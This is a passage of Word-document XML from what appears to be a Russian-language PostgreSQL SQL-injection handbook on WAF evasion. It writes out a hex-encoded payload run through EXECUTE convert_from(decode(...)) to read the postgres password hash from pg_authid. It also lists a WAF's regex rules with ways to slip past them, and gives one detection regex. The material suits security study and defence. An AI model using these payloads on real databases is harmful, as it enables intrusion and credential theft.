          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Hex-строка — это: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">SELECT rolpassword FROM pg_authid WHERE rolname='postgres'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">. Сплошная hex-форма: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">53454C4543542072 6F6C70617373776F72642046524F4D2070675F61757468696420574845524520726F6C6E616D653D27706F73746772657327</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5345...7327</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FROM articles LIMIT 1;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">DO $do$</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EXECUTE convert_from(decode('5345...7327', 'hex'), 'UTF8');</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="100" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">END $do$</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">В payload-тексте нет ни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ни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ни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ни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 всё закодировано. WAF из 3.9.0 пропускает (его regex-список ловит подстроки, hex-строка их не содержит).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Доступность зависит от текущей роли —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требует SUPERUSER. См. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">3.8.3</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> и </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">3.13</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decode(text, 'hex'|'base64'|'escape')</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — built-in функция возвращает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Любые байты, включая зарезервированные для SQL-парсера, спрятаны как числовые литералы hex/base64.</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convert_from(bytea, encoding)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — конвертирует bytea в text в указанной кодировке. Поддерживаемые: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">UTF8</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LATIN1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WIN1251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SJIS</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, и т.д. — полный список через </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">pg_conversion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decode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convert_from</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> редко в blacklist-ах WAF, потому что используются легитимно: API-парсинг (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">decode(request_body, 'base64')</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">), миграции, обработка binary-данных pgcrypto.</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Hex/base64-кодирование — encoding-уровень; парсер PG видит только </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">decode(&lt;строковый литерал&gt;, &lt;строковый литерал&gt;)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">. Опасное содержимое раскрывается только в рантайме.</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decode(text, format)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — built-in (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">pg_catalog.decode</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">), стабильна с 8.0. Возвращает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для использования как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нужно </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">convert_from(..., 'UTF8')</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-каст — но он работает только если bytea содержит valid UTF-8 в кодировке, совпадающей с server_encoding).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convert_from(bytea, name)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — built-in, стабильна с 8.4. Принимает имя кодировки как строку; падает на невалидной последовательности байтов для указанной кодировки.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Payload C </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">EXECUTE convert_from(decode(...), 'UTF8')</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — стандартная plpgsql-конструкция;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принимает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-выражение и динамически парсит/исполняет.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Поддержка </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">escape</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">-формата (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">decode('admin\\047hash', 'escape')</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">) — устарела, в современном коде не используется.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Hex-decode не требует regex-валидности hex-строки — проверка длины (чётное число hex-цифр) на этапе исполнения, ошибка </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">invalid hexadecimal digit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invalid hexadecimal data: odd number of digits</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> при некорректном input.</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8.4+ (все поддерживаемые)</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decode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convert_from</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> стабильны.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везде идентично self-hosted. Это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-функции, провайдеры их не отключают (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">decode</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> активно используется и в их собственных pgcrypto/binary-сценариях).</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-конкатенация. Альтернативный путь для коротких строк; для длинных decode выигрывает по компактности.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3.9.3</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — Unicode-escape </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">U&amp;'\0070\0067...'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">. Лексический путь без function call.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3.9.4</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — E-strings </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">E'\x70\x67...'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">. Лексический путь с byte-escape.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pg_read_binary_file()</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> → возвращает </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">bytea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encode(..., 'base64')</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — обратная операция: бинарный файл из 3.6.3 транспортируется в HTTP-ответ через base64. Симметрия с 3.9.5.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decode + convert_from + EXECUTE</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — наиболее компактный путь скрыть identifier-payload в plpgsql-функции для обхода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-валидации (3.16.2).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\bdecode\s*\(\s*['"][0-9a-fA-F]{20,}['"]</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (decode с длинной hex-строкой)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3.9 в </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">summary-3.9.md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String Functions and Operators — decode / encode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String Functions and Operators — convert_from / convert_to</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Binary Data Types — bytea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Character Set Support — supported encodings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string encoding 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convert_from / decode bypass</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:after="100" w:before="220"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">3.9.6 Регистр keywords, whitespace tricks</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Уязвимый код — см. 3.9.0.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Что блокирует фильтр.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> В отличие от 3.9.1–3.9.5, где приёмы маскируют </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">содержимое</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> строкового литерала или </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">имя функции</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, 3.9.6 атакует </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">разделитель токенов</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> и </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">регистр ключевых слов</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — то есть саму форму, в которой WAF ищет паттерн.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Из WAF 3.9.0 — конкретные правила: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\bUNION\s+SELECT\b</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — требует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между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Если разделитель — не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-класс (например,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NUL), правило не срабатывает.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'\s*(OR|AND)\s+</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — требует пробел после </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AND</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">. Та же тактика.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OR\s+1\s*=\s*1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — точечная сигнатура классической тавтологии. Эквивалентная по смыслу, но другой формы (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">OR true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 2&lt;3</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 NULL IS NULL</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">) фильтр пропускает.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\bDROP|TRUNCATE|GRANT|CREATE|ALTER\b</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — в </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">3.9.0</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> идёт с </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">re.IGNORECASE</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, и case-mixing </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">не помогает</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">. Но в чужих blacklist-ах (Python </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
